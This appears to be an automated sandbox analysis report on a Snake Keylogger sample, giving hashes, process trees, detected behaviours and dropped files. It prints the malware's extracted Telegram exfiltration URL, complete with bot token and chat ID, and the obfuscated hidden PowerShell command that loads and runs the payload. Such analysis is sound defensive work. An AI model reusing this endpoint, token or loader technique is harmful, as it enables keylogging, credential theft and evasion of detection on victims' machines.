Analysis
-
max time kernel
93s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 03:30
Static task
static1
Behavioral task
behavioral1
Sample
b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Wambles/Firtallene.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Wambles/Firtallene.ps1
Resource
win10v2004-20241007-en
General
-
Target
b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe
-
Size
793KB
-
MD5
c87c5a7ad95494abcb368fbfbe5508fd
-
SHA1
0e33726a7647be3c9753240857c4cdfaf7a4b851
-
SHA256
b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf
-
SHA512
1d45aabe8e0855f76c6b3a894b35480783f4f9fcde665dc08d90ae43c84962d9cf02971199718fa57a10711b808b16220a76cb3811c25501905380d4887444b9
-
SSDEEP
24576:mMwhYkaCzmb6f2b/hNZx0PARxFWfcFqal/F4X5Zi:mMwh0Omb7PZq+WfQiX5
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot8040460346:AAFN58T9Y0-aqdzScEiebBO06S141L8RsSA/sendMessage?chat_id=6680692809
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/2452-205-0x0000000000A00000-0x0000000001C54000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3744 powershell.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 2452 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2452 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3744 powershell.exe 2452 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\genfortolkende.ini b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Kdebrker\Sttteforeningen.man b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1684 2452 WerFault.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3744 powershell.exe Token: SeIncreaseQuotaPrivilege 3744 powershell.exe Token: SeSecurityPrivilege 3744 powershell.exe Token: SeTakeOwnershipPrivilege 3744 powershell.exe Token: SeLoadDriverPrivilege 3744 powershell.exe Token: SeSystemProfilePrivilege 3744 powershell.exe Token: SeSystemtimePrivilege 3744 powershell.exe Token: SeProfSingleProcessPrivilege 3744 powershell.exe Token: SeIncBasePriorityPrivilege 3744 powershell.exe Token: SeCreatePagefilePrivilege 3744 powershell.exe Token: SeBackupPrivilege 3744 powershell.exe Token: SeRestorePrivilege 3744 powershell.exe Token: SeShutdownPrivilege 3744 powershell.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeSystemEnvironmentPrivilege 3744 powershell.exe Token: SeRemoteShutdownPrivilege 3744 powershell.exe Token: SeUndockPrivilege 3744 powershell.exe Token: SeManageVolumePrivilege 3744 powershell.exe Token: 33 3744 powershell.exe Token: 34 3744 powershell.exe Token: 35 3744 powershell.exe Token: 36 3744 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4624 wrote to memory of 3744 4624 b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe 85 PID 4624 wrote to memory of 3744 4624 b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe 85 PID 4624 wrote to memory of 3744 4624 b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe 85 PID 3744 wrote to memory of 2452 3744 powershell.exe 97 PID 3744 wrote to memory of 2452 3744 powershell.exe 97 PID 3744 wrote to memory of 2452 3744 powershell.exe 97 PID 3744 wrote to memory of 2452 3744 powershell.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe"C:\Users\Admin\AppData\Local\Temp\b9bc7b1adca24293d38533d4af80b11fd24df9e28b1271f508f3047884b869bf.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Aerobated=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\haandbog\Wambles\Firtallene.Kon';$omdigtnings=$Aerobated.SubString(53429,3);.$omdigtnings($Aerobated)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 15284⤵
- Program crash
PID:1684
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2452 -ip 24521⤵PID:5020
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
52KB
MD53bc6283487e6d24c936852451b413c2a
SHA18217f7a25aadbe7b9f081d045b6899ef3df052fd
SHA25661f5a6c21629c953a1759b9f51f6abfcf11e7e4e2d3defe593871f20d1e0715d
SHA5121b94fe5a7869e223f21b5985fdb8a61bc90b8f4a4be5704ba6008b62f30710fd0da4c34f974d00bb566dee791b6fec41572be06074a6db80c39a46e6757aba2a
-
Filesize
352KB
MD5d3e916ba37b993f859d3df7b04ad65c5
SHA16f6ba3701e601c3b27bb1274b93d36e7b39b84b1
SHA256a4ceb200f51d0257fa702196bb751df7786dd7c1b7fbcc814a8fee61972192e9
SHA512fe5c5d60abdbfbe77cd77ac7a0c7524d0af907940cd8e8156fb9419ac32ffce13e7cc3218c6ccee813539a7a02460af2640bac76729a2d120196f7a4501ada82
-
Filesize
1KB
MD5eb15417d1086d52f880fbba82aad7bb3
SHA189cf69b911f98f6444cb115e41c4ec334cca6492
SHA256e7d37daba3c827b169a8c4825582da95aa4ed863a6b1d4e0536612bec118aea2
SHA51298c2d74c36f04a3524be8ec3d82033310e60610ee56e4456d961b4a549e3101bc6b62df03e9da76464fe6d3b65e2bba7adb62b5c0b9f6c4b8fe333a854ac947f